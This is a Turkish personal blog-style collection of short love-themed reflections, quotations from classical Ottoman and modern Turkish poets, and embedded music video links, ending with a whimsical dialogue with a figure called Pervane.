vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDar\u0131lma, i\u015fte b\u00f6yle... +\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::rxamCTtodME[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirka\u00e7 zorlu\u011fun i\u00e7inde kula\u00e7 atarken durdum, fark\u0131na vard\u0131m. \n\n_\"Sevgili Dost,_ +\n_Sen laz\u0131ms\u0131n bana! Ve \u00f6nemlisin hadiselerden.\"_\n\n_\"Sevgili Dost,_ +\n_Bug\u00fcn yazmak de\u011fil, konu\u015fmak istiyordum seninle. Ama yine yazd\u0131m.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::247592380[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::FfgLSNglfsY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMihrimah'da bulsa v\u00fccut.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNah\u00eef\u00ee sormu\u015f: +\n_\"G\u00f6z g\u00f6rd\u00fc g\u00f6n\u00fcl sevdi seni ey y\u00fcz\u00fc m\u00e2h\u0131m_ +\n_Kurb\u00e2n\u0131n olam var m\u0131 benim bunda g\u00fcn\u00e2h\u0131m\"_\u00a0\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Mevlam kulu sevdim seni_ \n\nvideo::MUZBPnjgzhw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAhmet Muhip Dranas'tan :\n\n_\"Bir g\u00fczelim sensin, bir de g\u00f6ky\u00fcz\u00fc,_ +\n_Gerisi denizler \u00f6tesi, hepsi._ +\n_G\u00f6ky\u00fcz\u00fcy\u00fcm g\u00fcnd\u00fcz\u00fcyle, gecesiyle,_ +\n_Sen g\u00fczelim a\u015fk\u0131yla, ne\u015fesiyle_ +\n_Uyumlu, esgin, el ele, ikiniz,_ +\n_Umutlarla bezer, g\u00f6nendirirsiniz_ +\n_\u00d6mr\u00fcm\u00fc, k\u0131y\u0131s\u0131nda bir ak\u015fam\u0131n.\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe desin bu fakir, d\u00fc\u011f\u00fcm d\u00fc\u011f\u00fcm olmu\u015fsa dili? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::-mZqs6VEwRk[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"kalbimin h\u00fcsn\u00fcyusuf mahrem bah\u00e7elerinde derindesin, r\u00fcya kadar derinde\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKendine k\u0131zan insan\u0131 ne geri \u00e7evirir bundan? Yap\u0131lan hatan\u0131n telafisi \u00f6z\u00fcr de\u011fil, biliyor hata yapan. Peki telafisi var m\u0131d\u0131r, bilmiyor.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa\u011fmurda y\u00fcr\u00fcyene, +\n_\"G\u00fcl\u00fc\u015f\u00fcne ya\u011fmur damlas\u0131 \u00e7arpsa,_ +\n_\u015eiir olur._ +\n_Bunu bir ben bilirim,_ +\n_Bir de g\u00f6ky\u00fcz\u00fc.\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Kanat tak\u0131p u\u00e7urur da bu d\u00fc\u015fler_ +\n_Uyand\u0131r\u0131r en tatl\u0131 yerinde_ +\n_G\u00fcn ortas\u0131nda sabah seherinde_ +\n_Hat\u0131rlan\u0131r yeniden_\n\nvideo::2H1oTjQ7fsI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::yKMDy_AigLQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kOxKvZJrUpA[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Z\u00fclf-i siyah\u0131 s\u00e2ye-i perr-i H\u00fcm\u00e2 imi\u015f_ +\n_\u0130kl\u00eem-i h\u00fcsne anun i\u00e7\u00fcn p\u00e2di\u015f\u00e2 imi\u015f\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::PNTW_77bOho[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::kU4ppB06qMc[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_G\u00fcn geldiyse..._\n\nvideo::e-Y0IEoczj8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Sana gelirim_\n\nvideo::251945761[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBundand\u0131r g\u00fczel ad\u0131n\u0131z oldu nihan. \n\nhttps:\/\/twitter.com\/iskenderpalanet\/status\/767788983829102592\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nOlmaz bilirim. Hem kendime hem m\u00e2h\u0131ma bir hat\u0131rlatma sadece: +\n_\"H\u00e2t\u0131r\u0131ndan \u00e7\u0131kmas\u0131n lutfet hem\u00e2n mehc\u00fbr olan_ +\n_Olmas\u0131n b\u00e2r\u00ee g\u00f6n\u00fclden d\u00fbr g\u00f6zden d\u00fbr olan\"_ +\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHamd et ey hakir g\u00f6nl\u00fcm \u00f6mr\u00fcnce, kafi gelmese de... Nas\u0131l s\u0131\u011fd\u0131rd\u0131n bir m\u00e2h\u0131 g\u00f6nl\u00fcne, nas\u0131l girdin bir m\u00e2h\u0131n g\u00f6nl\u00fcne? Hamd olsun... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Gel\" dese gitmez misin? +\nKo\u015fa ko\u015fa gidilir izin \u00e7\u0131ksa. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEsir-i z\u00fclf\u00fcn\u00fcm... \n\nvideo::R_aC7EFFACM[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSan\u0131rlar ki k\u0131zg\u0131n ve k\u0131rg\u0131n\u0131m. Asla! Bir de b\u00f6yle s\u00f6yleyelim ki ikna olunsun.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::ci2pe08q61M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nB\u00e2k\u00ee'den \u00e7al\u0131p s\u00f6ylesem \u00e7ok mudur? +\n\n_\"Hep senin\u00e7\u00fcnd\u00fcr benim d\u00fcnya cef\u00e2s\u0131n \u00e7ekti\u011fim_ +\n_Yoksa \u00f6mr\u00fcm var\u0131 sensiz neylerim d\u00fcny\u00e2y\u0131 ben\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKar nas\u0131l yakar insan\u0131n i\u00e7ini? Hat\u0131ra geldik\u00e7e bir sevin\u00e7 bir \u00f6zlem.\n\nvideo::255248711[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6zledim...\n\nvideo::255248790[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::efpvLTrg7_o[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcnayd\u0131n...\ud83c\udf38\ud83c\udf3a \n\nvideo::m9gZyhNPYdY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBekir Bey de olmasa nas\u0131l derdim ben? \n\nvideo::2AE9iCE0Asw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHuzuru sesinizde bulmu\u015fum efendim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir zamanlar, kimine k\u0131sa kimine uzundu vakitler. Kimi saniyelerle tartard\u0131 vakti bir avare nefesle, kalbin her at\u0131m\u0131yla. Yanmak m\u0131 denir, t\u00fctmek mi bilmezdi, bilmez. \u0130\u015fte o zamanlar bir ses duyar\u0131m, ah O'ndan bir iz bulurum diye d\u00fc\u015ft\u00fc\u011f\u00fc \u00e7emende \u015f\u00f6yle deyivermi\u015f O, eh fukara g\u00f6n\u00fcl bu bana olayd\u0131 ke\u015fke demi\u015f i\u00e7ini \u00e7ekerek: +\n\n_\"Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nSonras\u0131nda haddini a\u015f\u0131p \u015f\u00f6yle yaz\u0131vermi\u015f bizim pervaneve\u015f g\u00f6n\u00fcl sahibi: +\n\n_\"Hayalinde vard\u0131r a\u015f\u0131kun vuslat ey ahsen_ +\n_Ma\u015fuk okur mektubu h\u00e2kister-i kefterden_ +\n_Ama naz ed\u00fcp a\u015f\u0131k\u0131na elem ilen dersin sen_ +\n_Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nB\u00f6ylesine hadsizli\u011fe iten de nedir bizim avareyi?\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSadettin Hoca dinletiverdi: \n\n_\"A\u015fk\u0131nd\u0131r bana g\u00fczelim y\u00e2dig\u00e2r\"_\n\nvideo::rdn0VZuoiss[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki do\u011fmu\u015f o Mahr\u00fb! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir yan\u0131 siz olan \"biz\"ler ne g\u00fczel.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi geceler, Allah'a emanet olunuz. Zat\u0131n\u0131za ho\u015f\u00e7a bak\u0131n \ud83d\ude0a\ud83d\ude0a \n\n_Sizi rahats\u0131z etmekten \u00e7ekinerek buraya d\u00fc\u015f\u00fcrd\u00fcm yolumu. Art\u0131k ne vakit u\u011frad\u0131ysan\u0131z \u00f6yle olsun. \u0130yi sabahlar, iyi ak\u015famlar, iyi g\u00fcnler..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-Ne dersin Pervane, bizim de pabucumuz dama at\u0131l\u0131r m\u0131? +\n-Sen kendi derdine yan efendi. Ben hep yan\u0131nday\u0131m Mahr\u00fb'nun. Hem ne utanmaz adams\u0131n sen, sabiyi mi k\u0131skanacaks\u0131n? +\n-Aman esta\u011ffurullah yanl\u0131\u015f anlatt\u0131m galiba. K\u0131skanmak de\u011fil benimki. Kenara itilmekten korkmak sadece. Hem o minik masumu, teyzo\u015funun g\u00f6rmesini koklamas\u0131n\u0131 ne kadar istedi\u011fimi bilmez gibi konu\u015fuyorsun. Demem o ki sen yan\u0131na u\u011frars\u0131n mutlaka halimi arz et. 